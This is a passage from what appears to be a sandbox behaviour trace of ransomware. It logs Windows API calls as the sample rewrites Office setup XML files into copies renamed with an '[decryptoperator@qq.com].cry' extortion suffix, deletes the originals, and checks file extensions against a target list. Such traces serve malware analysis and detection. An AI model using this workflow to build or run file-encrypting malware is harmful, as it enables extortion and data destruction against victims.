dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.385] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=3186) returned 1 [0040.385] CloseHandle (hObject=0x1bc) returned 1 [0040.386] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 0x20 [0040.386] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.386] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.386] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.455] GetLastError () returned 0x0 [0040.455] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xc72, lpOverlapped=0x0) returned 1 [0040.505] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xc80, lpOverlapped=0x0) returned 1 [0040.506] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.506] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.506] SetEndOfFile (hFile=0x184) returned 1 [0040.506] CloseHandle (hObject=0x184) returned 1 [0040.507] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.507] SetEndOfFile (hFile=0x1bc) returned 1 [0040.507] CloseHandle (hObject=0x1bc) returned 1 [0040.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.508] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 1 [0040.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.508] lstrlenW (lpString=".doc") returned 4 [0040.508] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.508] lstrlenW (lpString=".docx") returned 5 [0040.508] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.508] lstrlenW (lpString=".pdf") returned 4 [0040.508] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.508] lstrlenW (lpString=".xls") returned 4 [0040.508] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.508] lstrlenW (lpString=".xlsx") returned 5 [0040.508] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.508] lstrlenW (lpString=".ppt") returned 4 [0040.508] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.508] lstrlenW (lpString=".zip") returned 4 [0040.508] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.508] lstrlenW (lpString=".rar") returned 4 [0040.508] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.508] lstrlenW (lpString=".bz2") returned 4 [0040.508] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.508] lstrlenW (lpString=".7z") returned 3 [0040.509] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.509] lstrlenW (lpString=".dbf") returned 4 [0040.509] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.509] lstrlenW (lpString=".1cd") returned 4 [0040.509] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.509] lstrlenW (lpString=".jpg") returned 4 [0040.509] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.509] lstrlenW (lpString=".doc") returned 4 [0040.509] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString=".docx") returned 5 [0040.509] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.509] lstrlenW (lpString=".pdf") returned 4 [0040.509] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString=".xls") returned 4 [0040.509] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString=".xlsx") returned 5 [0040.509] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.509] lstrlenW (lpString=".ppt") returned 4 [0040.509] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.509] lstrlenW (lpString=".zip") returned 4 [0040.509] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.509] lstrlenW (lpString=".rar") returned 4 [0040.509] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString=".bz2") returned 4 [0040.509] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString=".7z") returned 3 [0040.509] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.509] lstrlenW (lpString=".dbf") returned 4 [0040.509] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.509] lstrlenW (lpString=".1cd") returned 4 [0040.510] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.510] lstrlenW (lpString=".jpg") returned 4 [0040.510] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.510] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.510] lstrlenW (lpString="PowerPointMUI.XML") returned 17 [0040.510] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.510] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1450) returned 1 [0040.510] CloseHandle (hObject=0x1bc) returned 1 [0040.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 0x20 [0040.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.510] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.510] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.510] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.512] GetLastError () returned 0x0 [0040.512] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0040.527] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.528] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.528] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0040.528] SetEndOfFile (hFile=0x184) returned 1 [0040.528] CloseHandle (hObject=0x184) returned 1 [0040.529] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.529] SetEndOfFile (hFile=0x1bc) returned 1 [0040.529] CloseHandle (hObject=0x1bc) returned 1 [0040.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.530] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 1 [0040.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.530] lstrlenW (lpString=".doc") returned 4 [0040.530] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".docx") returned 5 [0040.530] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.530] lstrlenW (lpString=".pdf") returned 4 [0040.530] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".xls") returned 4 [0040.530] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".xlsx") returned 5 [0040.530] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.530] lstrlenW (lpString=".ppt") returned 4 [0040.530] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.530] lstrlenW (lpString=".zip") returned 4 [0040.530] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.530] lstrlenW (lpString=".rar") returned 4 [0040.530] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".bz2") returned 4 [0040.530] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".7z") returned 3 [0040.530] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.531] lstrlenW (lpString=".dbf") returned 4 [0040.531] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.531] lstrlenW (lpString=".1cd") returned 4 [0040.531] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.531] lstrlenW (lpString=".jpg") returned 4 [0040.531] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.531] lstrlenW (lpString=".doc") returned 4 [0040.531] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString=".docx") returned 5 [0040.531] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.531] lstrlenW (lpString=".pdf") returned 4 [0040.531] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString=".xls") returned 4 [0040.531] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString=".xlsx") returned 5 [0040.531] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.531] lstrlenW (lpString=".ppt") returned 4 [0040.531] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.531] lstrlenW (lpString=".zip") returned 4 [0040.531] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.531] lstrlenW (lpString=".rar") returned 4 [0040.531] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString=".bz2") returned 4 [0040.531] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString=".7z") returned 3 [0040.531] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.531] lstrlenW (lpString=".dbf") returned 4 [0040.531] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.531] lstrlenW (lpString=".1cd") returned 4 [0040.531] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.532] lstrlenW (lpString=".jpg") returned 4 [0040.532] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.532] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.532] lstrlenW (lpString="SETUP.XML") returned 9 [0040.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.535] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1886) returned 1 [0040.535] CloseHandle (hObject=0x1bc) returned 1 [0040.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 0x20 [0040.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.535] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.535] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.536] GetLastError () returned 0x0 [0040.536] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x75e, lpOverlapped=0x0) returned 1 [0040.549] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x760, lpOverlapped=0x0) returned 1 [0040.550] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.550] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.550] SetEndOfFile (hFile=0x184) returned 1 [0040.550] CloseHandle (hObject=0x184) returned 1 [0040.551] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.551] SetEndOfFile (hFile=0x1bc) returned 1 [0040.551] CloseHandle (hObject=0x1bc) returned 1 [0040.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.552] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 1 [0040.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.552] lstrlenW (lpString=".doc") returned 4 [0040.552] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.552] lstrlenW (lpString=".docx") returned 5 [0040.552] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.552] lstrlenW (lpString=".pdf") returned 4 [0040.552] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.552] lstrlenW (lpString=".xls") returned 4 [0040.552] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.552] lstrlenW (lpString=".xlsx") returned 5 [0040.552] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.553] lstrlenW (lpString=".ppt") returned 4 [0040.553] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.553] lstrlenW (lpString=".zip") returned 4 [0040.553] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.553] lstrlenW (lpString=".rar") returned 4 [0040.553] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString=".bz2") returned 4 [0040.553] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString=".7z") returned 3 [0040.553] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.553] lstrlenW (lpString=".dbf") returned 4 [0040.553] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.553] lstrlenW (lpString=".1cd") returned 4 [0040.553] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.553] lstrlenW (lpString=".jpg") returned 4 [0040.553] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.553] lstrlenW (lpString=".doc") returned 4 [0040.553] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString=".docx") returned 5 [0040.553] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.553] lstrlenW (lpString=".pdf") returned 4 [0040.553] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString=".xls") returned 4 [0040.553] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.553] lstrlenW (lpString=".xlsx") returned 5 [0040.553] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.553] lstrlenW (lpString=".ppt") returned 4 [0040.553] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.553] lstrlenW 